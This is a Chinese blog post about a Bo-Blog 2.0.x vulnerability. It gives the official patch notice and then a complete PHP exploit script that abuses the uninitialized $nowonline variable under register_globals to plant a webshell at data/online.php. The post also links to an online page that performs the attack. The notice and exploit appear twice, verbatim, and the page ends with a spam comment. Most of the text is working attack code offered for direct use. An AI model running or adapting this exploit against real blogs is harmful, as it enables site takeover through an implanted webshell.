开源的东西用的人多了,就可能有太多的人喜欢读代码,漏洞总是难免的,谢谢bob提供的升级代码,回家过年了。。。。升级后可能就会好些,也难免有新的漏洞发现,还好我的是linux系统因该大概不会有太大的漏洞,^_^。。
最新看到这个漏洞,是CNhCerKF告诉我的.这段时间忙,而且我劝他改用bo-blog结果他告诉我的最新漏洞.后来在网上和官方看了下.官方是11月22日出的补丁.下面是漏洞的信息.BO-blog是php+mysql架设的.目前网络上用的人很多.在玫瑰的博客有在线提交的页面http://www.mghacker.com/bo-blog.htm提交后,一句话马地址是:/data/online.php,直接拿到webshell.
==========================================================
官方补丁说明:http://www.bo-blog.com/bbs/topic_3604
受影响的版本:2.0.x 所有版本
危险等级:高,局部影响
触发条件:
服务器的PHP设置中,register_globals = On。register_globals = Off的情况下不受影响。
解决方法:
2.0.1 SP1用户或者2.0.2 SP2用户:请下载附件中的补丁程序,解压后上传、覆盖原先的文件。
其它版本用户:请先更新到 2.0.1 SP1用户或者2.0.2 SP2 ,然后打补丁,或者在php.ini中关闭register_globals。
===========================================================
Bo-Blog 2.0.2 sp2 出现了 $nowonline 未初始化的漏洞,导致online.php可以注入webshell,看下漏洞攻击的代码
Bo-Blog 2.0.2 sp2 出现了 $nowonline 未初始化的漏洞,导致online.php可以注入webshell,看下漏洞攻击的代码
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$data ='nowonline[]=&1468108794=orz&-1844564458=orz';
$server =$argv[1];
$sitepath =$argv[2];
if($argc!=3){
hr();
echo" Uaget: boblog.php www.defence80.com /blog/\r\n";
echo" We Are ScriptKiz....\r\n";
hr();
ver();
exit;
}
echo "\r\nExploit For Bo-blog Last Version \r\n";
echo "Need Register Globals = On\r\n";
echo "\r\n";
preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send("",'index.php'),$php);
echo "We Got php version:\t".$php[1]."\r\n";
function send($cmd,$script)
{
global $sitepath,$server,$cookie,$count;
$path =$sitepath.$script;
$count=$count+1;
$message = "POST ".$path." HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
//echo $message;
$fd = @fsockopen( $server, 80 );
@fputs($fd,$message);
$resp = "<-_->";
if($fd)
{
while(!@feof($fd)) {
$resp .= @fread($fd,1024);
}
}
@fclose($fd);
$resp .="-_->";
//echo $resp;
return $resp;
}
echo "Exploiting:\t\t............\r\n";
$response=send($data,'index.php');
$data='';
$response=send($data,'data/online.php');
if(strstr($response,'orz')) {
echo "We Got Webshell:\thttp://$server$path/data/online.php\r\n";
echo "For Fun :)";
}
else die("Exploit Failed!\r\n");
function ver(){
//版本信息,排列格式花了不少时间啊, - -|||
echo" +-------------------+ +-------------------+\r\n";
echo" +-www.loveshell.net-+ o'(-_-)'o +-- danger??? --+\r\n";
echo" +-------------------+ 啊?你说不怕火星人啊? +-------------------+\r\n";
hr();
}
function hr(){
echo" +-------------------------------------------------------------------+\r\n";
}
?>
最新看到这个漏洞,是CNhCerKF告诉我的.这段时间忙,而且我劝他改用bo-blog结果他告诉我的最新漏洞.后来在网上和官方看了下.官方是11月22日出的补丁.下面是漏洞的信息.BO-blog是php+mysql架设的.目前网络上用的人很多.在玫瑰的博客有在线提交的页面http://www.mghacker.com/bo-blog.htm提交后,一句话马地址是:/data/online.php,直接拿到webshell.
==========================================================
官方补丁说明:http://www.bo-blog.com/bbs/topic_3604
受影响的版本:2.0.x 所有版本
危险等级:高,局部影响
触发条件:
服务器的PHP设置中,register_globals = On。register_globals = Off的情况下不受影响。
解决方法:
2.0.1 SP1用户或者2.0.2 SP2用户:请下载附件中的补丁程序,解压后上传、覆盖原先的文件。
其它版本用户:请先更新到 2.0.1 SP1用户或者2.0.2 SP2 ,然后打补丁,或者在php.ini中关闭register_globals。
===========================================================
Bo-Blog 2.0.2 sp2 出现了 $nowonline 未初始化的漏洞,导致online.php可以注入webshell,看下漏洞攻击的代码
Bo-Blog 2.0.2 sp2 出现了 $nowonline 未初始化的漏洞,导致online.php可以注入webshell,看下漏洞攻击的代码
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$data ='nowonline[]=&1468108794=orz&-1844564458=orz';
$server =$argv[1];
$sitepath =$argv[2];
if($argc!=3){
hr();
echo" Uaget: boblog.php www.defence80.com /blog/\r\n";
echo" We Are ScriptKiz....\r\n";
hr();
ver();
exit;
}
echo "\r\nExploit For Bo-blog Last Version \r\n";
echo "Need Register Globals = On\r\n";
echo "\r\n";
preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send("",'index.php'),$php);
echo "We Got php version:\t".$php[1]."\r\n";
function send($cmd,$script)
{
global $sitepath,$server,$cookie,$count;
$path =$sitepath.$script;
$count=$count+1;
$message = "POST ".$path." HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
//echo $message;
$fd = @fsockopen( $server, 80 );
@fputs($fd,$message);
$resp = "<-_->";
if($fd)
{
while(!@feof($fd)) {
$resp .= @fread($fd,1024);
}
}
@fclose($fd);
$resp .="-_->";
//echo $resp;
return $resp;
}
echo "Exploiting:\t\t............\r\n";
$response=send($data,'index.php');
$data='';
$response=send($data,'data/online.php');
if(strstr($response,'orz')) {
echo "We Got Webshell:\thttp://$server$path/data/online.php\r\n";
echo "For Fun :)";
}
else die("Exploit Failed!\r\n");
function ver(){
//版本信息,排列格式花了不少时间啊, - -|||
echo" +-------------------+ +-------------------+\r\n";
echo" +-www.loveshell.net-+ o'(-_-)'o +-- danger??? --+\r\n";
echo" +-------------------+ 啊?你说不怕火星人啊? +-------------------+\r\n";
hr();
}
function hr(){
echo" +-------------------------------------------------------------------+\r\n";
}
?>
作者:jackxiang@向东博客 专注WEB应用 构架之美 --- 构架之美,在于尽态极妍 | 应用之美,在于药到病除
地址:https://jackxiang.com/post/473/
版权所有。转载时必须以链接形式注明作者和原始出处及本声明!
最后编辑: jackxiang 编辑于2007-1-24 11:07
评论列表
2012-7-30 16:25 | burberry outlet
Ha ha, my lucky, and met such a good content ah, my heart is secretly exclusiveness. Good content can let me feel happy, also can let me learn more knowledge, to enrich themselves. I will continue to focus on such content, the fight with the author to make friends.
分页: 1/1 1